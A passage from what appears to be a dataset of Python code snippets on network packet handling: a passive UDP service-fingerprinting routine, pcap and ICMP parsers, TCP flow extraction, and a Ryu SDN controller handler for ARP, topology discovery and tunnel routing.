> -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ssdp/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"3865\") and (dIP == \"255.255.255.255\"):\t\t#XPL, http://wiki.xplproject.org.uk/index.php/Main_Page\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"xpl/client\")\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (dIP == \"216.115.30.28\") or (dIP == \"69.59.227.77\") or (dIP == \"69.59.232.33\") or (dIP == \"69.59.240.84\") ):\t\t#Vonage SIP client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061 SIP/2.0') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tSipMatch = SipPhoneMatch.search(Payload)\n\t\t\t\t\t\tif (SipMatch != None) and (len(SipMatch.groups()) >= 1):\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client, phone number: \" + SipMatch.group(1))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (sIP == \"216.115.30.28\") or (sIP == \"69.59.227.77\") or (sIP == \"69.59.232.33\") or (sIP == \"69.59.240.84\") ):\t#Vonage SIP server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061>') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"sip/vonage_server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"6515\") and (dport == \"6514\") and (dIP == \"255.255.255.255\"):\t\t#mcafee ASaP broadcast, looking for a proxy out. http://www.myasap.de/intl/EN/content/virusscan_asap/faq_new.asp\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('<rumor version=') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"asap/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"9052\") or (sport == \"9053\") or (sport == \"9054\") ) and ( (sIP == \"205.188.146.72\") or (sIP == \"205.188.157.241\") or (sIP == \"205.188.157.242\") or (sIP == \"205.188.157.243\") or (sIP == \"205.188.157.244\") or (sIP == \"64.12.51.145\") or (sIP == \"64.12.51.148\") or (sIP == \"149.174.54.131\") ):\t#Possibly AOL dns response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('dns-01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"aoldns/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27005\") and ( (dport == \"27016\") or (dport == \"27017\") ):\t\t\t\t#Halflife client live game\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27013\") and (dIP == \"207.173.177.12\"):\t\t\t\t#variable payload, so can't (Payload != None) and (Payload.find('Steam.exe') > -1)\t\t\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (sport == \"27013\") and (sIP == \"207.173.177.12\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (sport == \"27016\") or (sport == \"27017\") ) and (dport == \"27005\"):\t\t\t\t#halflife server live game\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"27015\") or (dport == \"27016\") or (dport == \"27025\") or (dport == \"27026\") ):\t\t#Variable payload, so can't: (Payload != None) and (Payload.find('basic') > -1)\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27017\") and ( (dIP == \"69.28.148.250\") or (dIP == \"69.28.156.250\") or (dIP == \"72.165.61.161\") or (dIP == \"72.165.61.185\") or (dIP == \"72.165.61.186\") or (dIP == \"72.165.61.188\") or (dIP == \"68.142.64.164\") or (dIP == \"68.142.64.165\") or (dIP == \"68.142.64.166\") ):\t#Steamfriends client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"steamfriends/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27017\") and ( (sIP == \"69.28.148.250\") or (sIP == \"69.28.156.250\") or (sIP == \"72.165.61.161\") or (sIP == \"72.165.61.185\") or (sIP == \"72.165.61.186\") or (sIP == \"72.165.61.188\") or (sIP == \"68.142.64.164\") or (sIP == \"68.142.64.165\") or (sIP == \"68.142.64.166\") ):\t#Steamfriends server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"steamfriends/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"21020\") or (sport == \"21250\") or (sport == \"27016\") or (sport == \"27017\") or (sport == \"27018\") or (sport == \"27030\") or (sport == \"27035\") or (sport == \"27040\") or (sport == \"28015\") ):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Team Fortress') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27019\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"1265\") or (dport == \"20100\") or (dport == \"21550\") or (dport == \"27000\") or (dport == \"27017\") or (dport == \"27018\") or (dport == \"27019\") or (dport == \"27022\") or (dport == \"27030\") or (dport == \"27035\") or (dport == \"27050\") or (dport == \"27078\") or (dport == \"27080\") or (dport == \"28015\") or (dport == \"28100\") or (dport == \"45081\") ):\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Source Engine Query') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"24441\"):\t\t\t#Pyzor\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('User:') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"pyzor/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t#FIXME - interesting issue; the ttl<5 test will catch traceroutes coming into us, but not ones we're creating to go out. Hmmm.\n\t\t\telif ( (dport >= \"33434\") and (dport <= \"33524\") ) and (p['IP'].ttl <= 5):\t#udptraceroute client\n\t\t\t\tif ((not LiveUDPClient.has_key(sIP + \"UDP_33434\")) or (LiveUDPClient[sIP + \"UDP_33434\"] == False)):\n\t\t\t\t\tLiveUDPClient[sIP + \"UDP_33434\"] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_33434\", \"open\", \"udptraceroute/client\")\n\t\t\telif (dport == \"40348\"):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('HLS') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (p['IP'].frag > 0):\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"207.46.51.74\") or (sIP == \"65.55.251.10\"):\t\t\t\t#Bigfish.com - dns?\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"61.215.106.146\"):\t\t\t\t#junk\n\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tDebug(\"Other IP protocol (\" + str(p['IP'].src) + \"->\" + str(p['IP'].dst) + \"): \" + str(p['IP'].proto))\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x86DD:\t\t#IPv6\n\t\tUnhandledPacket(p)\n\telse:\n\t\tprint \"Unregistered ethernet type:\", p['Ethernet'].type\n\t\tUnhandledPacket(p)", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def process_pcap(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n self.process_pkts(pkts)", "def parse_packet(data):\n ip = IPPacket(data)\n icmp = ICMPPacket(ip.payload)\n print('ICMP message from %s, type %d (%s), code %d, %d byte payload.') % (\n ip.src_addr, icmp.type, ICMP_TYPES[icmp.type], icmp.code,\n len(icmp.payload))\n return len(icmp.payload)", "def parse_packet(packet, recipient_type, pkt_type, exp_src, exp_dst, step):\n\n packet_count = 0\n expected_packet_count = PKT_COUNT\n\n # Calling check_packet helper function to determine how many packets are\n # correctly received. Function returns packet_count\n packet_count = check_packet(\n packet, recipient_type, pkt_type, exp_src, exp_dst)\n\n # Print packet count at each host\n print(\"Packet count at {} was {}\".format(recipient_type, packet_count))\n\n # Store packet_counts in global dict RECEIVED_PKT_DICT\n # Dict needed for ECMP check\n RECEIVED_PKT_DICT[recipient_type] = packet_count", "def __parse_tree(self, packet):\n info = extract_int_data(packet[Ether])\n logger.info('Processing packet with info [%s]', info)\n\n macs = search.findall_by_attr(self.tree, info.get('srcMac'),\n name='name', maxlevel=2, maxcount=1)\n\n mac = None\n src_ip = None\n dst_ip = None\n dst_port = None\n packet_size = None\n\n if len(macs) > 0:\n mac = macs[0]\n src_ips = search.findall_by_attr(\n mac, info.get('srcIP'), name='name', maxlevel=2, maxcount=1)\n if len(src_ips) is not 0:\n src_ip = src_ips[0]\n dst_ips = search.findall_by_attr(\n src_ip, info.get('dstIP'), name='name', maxlevel=2,\n maxcount=1)\n if len(dst_ips) is not 0:\n dst_ip = dst_ips[0]\n logger.info('Processing source IPs - %s', src_ips)\n dst_ports = search.findall_by_attr(\n dst_ip, info.get('dstPort'), name='name',\n maxlevel=2, maxcount=1)\n if len(dst_ports) is not 0:\n dst_port = dst_ports[0]\n packet_sizes = search.findall_by_attr(\n dst_port, info.get('packet_size'),\n name='name', maxlevel=2, maxcount=1)\n if len(packet_sizes) is not 0:\n packet_size = packet_sizes[0]\n\n return mac, src_ip, dst_ip, dst_port, packet_size", "def tcp_traceflow(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n protocol=LINKTYPE.get(packet.name.upper()), # data link type from global header\n index=count, # frame number\n frame=packet2dict(packet), # extracted packet\n syn=bool(tcp.flags.S), # TCP synchronise (SYN) flag\n fin=bool(tcp.flags.F), # TCP finish (FIN) flag\n src=ipaddress.ip_address(ip.src), # source IP\n dst=ipaddress.ip_address(ip.dst), # destination IP\n srcport=tcp.sport, # TCP source port\n dstport=tcp.dport, # TCP destination port\n timestamp=time.time(), # timestamp\n )\n return True, data\n return False, None", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + 